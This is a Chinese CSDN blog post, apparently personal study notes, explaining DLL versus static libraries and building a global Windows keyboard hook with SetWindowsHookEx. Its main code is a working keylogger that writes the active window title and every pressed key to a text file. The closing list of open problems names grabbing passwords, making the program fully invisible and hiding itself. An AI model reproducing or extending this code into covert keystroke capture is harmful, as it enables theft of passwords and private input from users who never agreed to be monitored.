hook(笔记)

最新推荐文章于 2023-09-09 17:01:08 发布
最新推荐文章于 2023-09-09 17:01:08 发布
阅读量316 收藏
点赞数 1
分类专栏: MFC(笔记) 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46949627/article/details/121055595
版权
本文详细介绍了如何使用C++创建动态链接库DLL,并实现键盘钩子来监听系统中的键盘事件。从创建项目、编写DLL导出函数,到安装和卸载钩子,以及处理键盘消息,整个过程清晰阐述。最后提到了一些实际应用中可能遇到的问题,如密码抓取的挑战和隐藏自身等。
摘要由CSDN通过智能技术生成

一、创建

本文钩子的使用以动态库方式完成

钩子是一个用于Windows下所有事件的监听器,用于抓取其系统中的所有消息。

使用Windows桌面应用向导,生成一个桌面应用。

再解决方案下添加另一个项目,该项目用来写钩子

 然后为钩子项目准备两个文件,用于声明和实现

#pragma once
//以C的方式,以动态链接库的方式导出函数
//extern "C" 以C语言方式(函数),此外,C++方式则一般为类
//_declspec(dllexport)导出函数为dll函数
extern "C" _declspec(dllexport) bool installHook();
extern "C" _declspec(dllexport) bool unInstallHook();



bool installHook() {//安装钩子

	return true;
}
bool unInstallHook() {//卸载钩子

	return true;
}

 同时,需要在Project.cpp项目中进行修改 ​

//以C语言方式,动态链接库形式导入函数
extern "C" _declspec(dllimport) bool installHook();
extern "C" _declspec(dllimport) bool unInstallHook();

 点击重新生成

 成功后,在项目的debug处看到

 我们成功生成了应用程序扩展库文件

二、DLL与SLL

SLL(static link library):使用静态链接库。在编译时,将代码加入项目当中。

  • 两个文件相关:.h头文件lib文件
  • .h头文件:包含lib中说明输出的类或符号原型或数据结构。调用.lib文件时,需要将.h头文件包含入应用程序的源文件中。
  • .lib文件:此处为静态lib文件是obj文件的集合。
  • .obj文件:是.cpp文件编译之后产生的一种文件。一个.cpp文件编译之后只会产生一个.obj文件,而多个.obj文件就可以连接生成lib文件
  • 我们在使用时,一般就是导入.lib文件的同时,将头文件.h导入,再通过include的方式使用。

DLL(dynamic link library):使用动态链接库。对于项目而言,仅包含在运行时定位DLL函数的可执行代码所需的信息。

  • 三个文件相关:.dll文件.h头文件lib文件
  • .h头文件:应用程序调用dll时,仍需要将该文件包含入应用程序的源文件中。
  • .lib文件:动态lib文件是dll在编译、链接成功后生成的文件。调用dll时,需要将该文件引入应用程序(亦可以可通过LoadLibrary、GetProcAddress装载,此方式 将不需要lib)。
  • .dll文件:执行文件。对于发布的文件可以不需要.h头文件.lib文件而单独使用。但若要继续Debug、修改项目,则仍旧需要其他两个文件。
  • 一般需要在生成文件时,通过#pragma comment(lib,"库名称.lib")

 三、键盘钩子

现在导入链接库 

(.lib文件会在我们完成实现后,运行项目,通过_declspec.dll文件出现在同一个文件夹,注意.lib文件与调用它的.cpp文件的位置)

 安装钩子与卸载钩子

我们需要在窗口创建完毕后,生成钩子,在窗口关闭前删除钩子。

 现在修改WndProc回调函数(处理主窗口消息),

实现钩子

记得重新生成,覆盖原有DLL

 先完善头文件

#pragma once
#include<windows.h>
//以C的方式,以动态链接库的方式导出函数
//extern "C" 以C语言方式(函数),此外,C++方式则一般为类
//_declspec(dllexport)导出函数为dll函数
extern "C" _declspec(dllexport) bool installHook();//安装钩子
extern "C" _declspec(dllexport) bool unInstallHook();//卸载钩子


HHOOK hHook;
LRESULT CALLBACK hookProc(int code, WPARAM wParam, LPARAM  lParam);
bool installHook();
bool unInstallHook();

然后是部分功能的实现,此时钩子是全局监视

#include "KeyHook.h"

LRESULT CALLBACK hookProc(int code, WPARAM wParam, LPARAM  lParam) {
	//测试
	MessageBox(NULL, L"有人进行按键操作", L"钩子处理函数执行", NULL);
	//拿到当前操作窗口的标题

	//拿到当前按下键上的字符

	//保存到文件
	return NULL; 
}


bool installHook() {//安装钩子
	//SetWindowsHook只能适用32位,Ex位升级版
	    hHook = SetWindowsHookEx(
		WH_KEYBOARD,//钩子种类,此处我们埋下键盘消息钩子
		hookProc,//设置钩子的处理函数,以回调的形式
		GetModuleHandle(L"KeyHook"),//GetModuleHandle:通过项目名称,获得该项目的实例句柄
		NULL//线程ID,NULL自动分配
	);
	if (hHook == NULL) 
		return false;
	//父窗口,内容,标题,提示类型(图标)
	MessageBox(NULL, L"钩子已安装", L"提示", NULL);
	return true;
}

bool unInstallHook() {//卸载钩子
	UnhookWindowsHookEx(hHook);
	return true;
}

 钩子处理函数

现将钩子处理函数进一步处理函数完善,代码如下

#include "KeyHook.h"

LRESULT CALLBACK hookProc(int code, WPARAM wParam, LPARAM  lParam) {
	//测试
	//MessageBox(NULL, L"有人进行按键操作", L"钩子处理函数执行", NULL);
	//拿到当前操作窗口的句柄
	HWND hWnd = ::GetActiveWindow();//获得当前活动窗口句柄,使用全局符号,避免有相同函数名称
	char windowTextBuff[256] = { 0 };//存储窗口标题
	char keyTextBuff[256] = { 0 };//存储按下的字符
	if (NULL == hWnd) {//如果没有活动窗口,则去拿顶层窗口
		hWnd = ::GetForegroundWindow();
		if (NULL == hWnd) {//如果没有窗口,只有桌面,则不要此次数据
        //调用下一次钩子处理(再次下钩),意味着消息并未处理,下传消息
			return CallNextHookEx(hHook,code,wParam,lParam);
		}
	}
	//拿到当前按下键上的字符
	//末尾加 A指的是ANSI
	//末尾加 W指的是UNICODE
	//不加是一个宏,会自动转换
	GetWindowTextA(hWnd, windowTextBuff, 255);
	if (code < 0 || code == HC_NOREMOVE) {	//排除拿不到的键
		return CallNextHookEx(hHook, code, wParam, lParam);
	}
	if (lParam & 0x40000000) {//排除系统按键
		return CallNextHookEx(hHook, code, wParam, lParam);
	}
	//获取按键
	GetKeyNameTextA(lParam, keyTextBuff, 255);
	//保存到文件
	//创建或打开文件
	FILE* fp = NULL;
	fopen_s(&fp,"information.txt", "a");//以追加写的方式打开
	if (fp == NULL) {
		MessageBox(NULL, L"记录文件部署失败", L"提示", NULL);
	    return CallNextHookEx(hHook, code, wParam, lParam);
	}
	//合并数据
	fprintf_s(fp, "%s : %s\n", windowTextBuff,keyTextBuff);
	//保存并关闭文件
	fclose(fp);
    //意味着消息已经处理,不需要继续下传
	return NULL; 
}


bool installHook() {//安装钩子
	//SetWindowsHook只能适用32位,Ex位升级版
		hHook = SetWindowsHookEx(
		WH_KEYBOARD,//钩子种类,此处我们埋下键盘消息钩子
		hookProc,//设置钩子的处理函数,以回调的形式
		GetModuleHandle(L"KeyHook"),//GetModuleHandle:通过项目名称,获得该项目的实例句柄
		NULL//线程ID,NULL自动分配
	);
	if (hHook == NULL) 
		return false;
	//父窗口,内容,标题,提示类型(图标)
	MessageBox(NULL, L"钩子已安装", L"提示", NULL);
	return true;
}

bool unInstallHook() {//卸载钩子
	UnhookWindowsHookEx(hHook);
	return true;
}

但这仍然有很多问题。

  1. 客户端抓取到的密码是加密或者根本无法被抓取
  2. 抓取项目本身会出问题
  3. 无法抓取输入法信息
  4. 需要将窗口绘画函数关闭,进行完全不可见操作
  5. 需要隐藏自身

yjx23332
关注
专栏目录
浅谈HOOK
hdduuyf的博客
11-13 222
浅谈HOOK
PC微信hook学习笔记(一)—— 获取个人信息
qq_32886245的博客
12-27 7714
这次跟着课程学习下如何发送微信消息。本篇笔记学习教程:找微信个人数据基址。
HOOK笔记[2]
dianmian4635的博客
09-28 115
二、全局HOOKI、编写DLL 1#include<windows.h>23HHOOKhMouseHook;4HHOOKhKeyHook;56#pragmadata_seg("MySec")7HWNDhWnd=NULL;8#pragmadata_seg()910//#pragmacomment(linker,"/secti...
React进阶 —— Hook学习笔记
火星基地
06-05 408
1. Hook 简介 Hook 是 React 16.8.0 版本增加的新特性,可以在函数组件中使用 state 以及其他的 React 特性。 ✌️Hook 使用规则: Hook 就是 JavaScript 函数,但是使用它们会有两个额外的规则: 只能在函数最外层调用 Hook。不要在循环、条件判断或者子函数中调用。 只能在 React 的函数组件中调用 Hook,不要在其他 JavaScript 函数中调用。(还有一个地方可以调用 Hook —— 自定义 Hook) 下面介绍几个常用的 Hook
学习hook笔记(使用工具沙盒)
weixin_45948938的博客
01-29 219
1.初学hook 引入 import React, { useEffect, useState } from "react"; 举个简单的例子(点击按钮加一) 在js文件中直接使用一个自定义hook const useFun = (a) => { // 函数设置数组中第一个值是变量,第二个是改变边变量值的函数,后面括号中值为初始值 const [count, setCount] = useState(a); // 自定义一个函数,书写逻辑代码 const add = () =&gt
HookProc 和 CallNextHookEx
swartz_lubel的专栏
07-09 5504
钩子过程必须具有以下语法:LRESULT CALLBACK HookProc( int nCode, WPARAM wParamLPARAM lParam ) { //进程事件 ... 返回CallNextHookEx(NULL,nCode,wParamlParam); } HookProc是特定的回调函数,CallNextHookEx表示将钩子信息传递
c# HookProc 钩子
最新发布
nbspzs的专栏
09-09 357
【代码】c# HookProc 钩子。
js hook笔记1
08-08
JS Hook笔记1 JS Hook是JavaScript中的一种调试技术,用于hook JavaScript代码中的方法或属性,以便进行调试、修改或验证。JS Hook的主要思想与Frida Hook相似,都是使用Object.defineProperty()方法来实现hook操作...
frida -hook 笔记--byte[]转String进行参数打印与替换参数
清水渔渔的博客
03-18 5929
博主最近在学习使用frida,在hook某个native函数的的时候,发现参数和返回值都是byte[]数据类型,因为想查看传参和返回值, 下面就记录一下如何在js代码中如果打印byte[] public static native byte[] aseEncrypt(byte[] bArr,byte[] bArr,); 一下代码成功打印参数和返回结果的16进制字符串 Java.perform(function () { var ByteString = Java.use("com.android.
0基础入门通杀型 js hook笔记
02-15 269
但是我们为什么不在浏览器里面写Proxy而是只在nodejs里面写呢,因为在浏览器中window对象是不能重写的,自然就不能重写window的代理器,所以我们只能在nodejs中使用Proxy,因为不能重写window就索然无味,但是我们可以监听新赋值的变量,例如有一些变量我们不知道他是什么时候生成的在哪里生成的我们就可以使用下面的这种技巧。当然这只是最基础的hook方式我们还要过一些简单的检测,比如重写他的toString方法去掉他的一些修改特征,这种古老又有效的方法,最终成品如下。
HOOK入门
02-26
作为第一篇关于HOOK的学习笔记,先就HOOK的基本知识做个小结,然后给出一个简单的通过控制台实现的键盘钩子例子。本篇笔记结构如下:Windows消息机制WindowsHOOK机制(全局HOOK)核心函数简单程序示例问题Windows...
SetWindowsHookEx
顺其自然~专栏
07-06 631
钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程(子程位于当前程序中,或者位于DLL中)以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。 钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续.
[DLL劫持] 3 DLL劫持之实践 例子
智者千虑 必有一失
07-12 4704
该系列文章是依据本人平时对动态链接库的学习,归纳总结,所做的学习笔记。如有错误或待改善之处,请留下您宝贵的意见或建议。   先说说DLL劫持的原理吧,以下这段来自百度百科对DLL劫持原理的说明: 由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各
深入分析C#键盘勾子(Hook)拦截器,屏蔽键盘活动的详解
weixin_42099527的博客
04-04 3156
这个列表的指针指向指定的,应用程 序定义的,被Hook子程调用的回调函数,也就是该钩子的各个处理子程。最近安装的钩子放在链的开始, 而最早安装的钩子放在最后,也就是后加入的先获得控制权。也就是说每个进程所拥有的相同的DLL的全局数据,它们的名称相同,但其值却并不一定是相同的,而且是互不干涉的。在钩子子程中调用得到控制权的钩子函数在完成对消息的处理后,如果想要该消息继续传递,那么它必须调用另外一个 SDK中的API函数CallNextHookEx来传递它,以执行钩子链表所指的下一个钩子子程。
dll编程导出接口的两种方法
qingzai_的专栏
04-02 4251
前言: 在vc中到处dll有两种方法: 第一种:是通过模块定义def文件,把要导出的函数接口放在里面,而def文件为链接器提供有关程序的到处,属性等方面的信息。 第二种:在函数声明中加上__declspec(dllexport); 第一种方法示例: 先构建一个名为:mousehook_dll的dll项目: 在hookLoad.h种声明两个接口函数: #pragma once
HOOK专题(转)
刘雁行的专栏
01-06 1945
HOOK专题目录基本概念 运行机制 钩子类型 作者基本概念钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。钩子实际上是一个处理消息的程序段,通过系
vc中,钩子的回调函数的参数wparamlparam的问题
问题记事本
03-01 1276
<br />摘自:http://topic.csdn.net/u/20090228/16/c31dc299-a563-47df-a914-3def1ba08926.html<br /> <br />LRESULT CALLBACK KeyboardProc( int code,<br />  WPARAM wParam,<br />  LPARAM lParam<br />);<br />Parameters<br /><br />code<br />[in] Specifies a code the ho
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值